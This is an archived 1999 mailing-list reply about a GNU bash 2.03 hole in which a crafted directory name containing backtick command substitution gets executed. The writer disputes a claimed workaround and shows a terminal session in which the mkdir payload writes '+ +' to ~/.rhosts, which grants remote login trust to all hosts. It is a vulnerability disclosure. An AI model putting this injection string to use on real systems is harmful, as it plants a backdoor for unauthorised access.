At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote: .| >If a user creates a directory with a command like .| > .| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " .| > .| Just to clarify, this only happens if PS1 (the bash prompt) contains .| \w or \W _and_ a prompt is displayed containing the bogus directory name. .| This means unattended shell scripts are safe. As a workaround, use `pwd` .| in place of \w. .| Unfortunately this is not true. here is why: rush:/tmp> bash --version GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu) Copyright 1998 Free Software Foundation, Inc. rush:/tmp> bash bash-2.03$ echo $PS1 \s-\v\$ bash-2.03$ cat ~/.rhosts cat: /export/home/guy/.rhosts: No such file or directory bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` " bash-2.03$ cd \\\ \ / bash-2.03$ cat /export/home/guy/.rhosts\ + + sh-2.03$ -- Guy Cohen <guyat_private>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:32 PDT